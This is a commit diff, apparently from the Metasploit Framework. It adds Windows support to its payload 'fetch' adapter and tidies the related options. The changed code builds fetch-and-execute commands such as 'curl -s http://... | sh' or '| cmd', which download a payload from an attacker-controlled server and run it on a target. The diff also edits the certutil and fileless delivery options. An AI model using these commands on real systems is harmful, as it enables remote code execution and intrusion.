Add Windows pipe fetch support and clean up options

bwatters-r7 · bwatters-r7 · commit d1c6a6e82eeb · 2025-04-01T16:38:29.000-05:00
diff --git a/lib/msf/core/payload/adapter/fetch.rb b/lib/msf/core/payload/adapter/fetch.rb
@@ -92,6 +92,7 @@ def generate(opts = {})
         fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected for FETCH_PIPE option')
       end
       @pipe_cmd = generate_fetch_commands
+      @pipe_cmd << "\n" if windows? #need CR when we pipe command in Windows
       vprint_status("Command served: #{@pipe_cmd}")
       cmd = generate_pipe_command
     else
@@ -265,7 +266,7 @@ def _generate_certutil_command
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
     end
-    cmd + _execute_add(get_file_cmd)
+    _execute_add(get_file_cmd)
   end
 
   # The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains "memfd") with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor
@@ -314,13 +315,15 @@ def _generate_curl_command
   end
 
   def _generate_curl_pipe
+    execute_cmd = 'sh'
+    execute_cmd = 'cmd' if windows?
     case fetch_protocol
     when 'HTTP'
-      return "curl -s http://#{_download_pipe} | sh"
+      return "curl -s http://#{_download_pipe} | #{execute_cmd}"
     when 'HTTPS'
-      return "curl -sk https://#{_download_pipe} | sh"
+      return "curl -sk https://#{_download_pipe} | #{execute_cmd}"
     when 'TFTP'
-      return "curl -s tftp://#{_download_pipe} | sh"
+      return "curl -s tftp://#{_download_pipe} | #{execute_cmd}"
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
     end
diff --git a/lib/msf/core/payload/adapter/fetch/linux_options.rb b/lib/msf/core/payload/adapter/fetch/linux_options.rb
@@ -5,9 +5,9 @@ def initialize(info = {})
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
         Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),
-        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
-        Msf::OptBool.new('FETCH_PIPE', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false]),
-        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
+        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'none']),
+        Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL WGET]]),
+        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'none'])
       ]
     )
   end
diff --git a/lib/msf/core/payload/adapter/fetch/windows_options.rb b/lib/msf/core/payload/adapter/fetch/windows_options.rb
@@ -6,6 +6,7 @@ def initialize(info = {})
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL TFTP CERTUTIL }]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}),
+        Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL]]),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', '%TEMP%'], regex:/^[\S]*$/)
       ]
     )

Original file line number	Diff line number	Diff line change
`@@ -5,9 +5,9 @@ def initialize(info = {})`
`5`	`5`	`[`
`6`	`6`	`Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),`
`7`	`7`	`Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),`
`8`		`- Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),`
`9`		`- Msf::OptBool.new('FETCH_PIPE', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false]),`
`10`		`- Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])`
	`8`	`+ Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'none']),`
	`9`	`+ Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL WGET]]),`
	`10`	`+ Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'none'])`
`11`	`11`	`]`
`12`	`12`	`)`
`13`	`13`	`end`
Original file line number	Diff line number	Diff line change
`@@ -6,6 +6,7 @@ def initialize(info = {})`
`6`	`6`	`[`
`7`	`7`	`Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL TFTP CERTUTIL }]),`
`8`	`8`	`Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}),`
	`9`	`+ Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL]]),`
`9`	`10`	`Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', '%TEMP%'], regex:/^[\S]*$/)`
`10`	`11`	`]`
`11`	`12`	`)`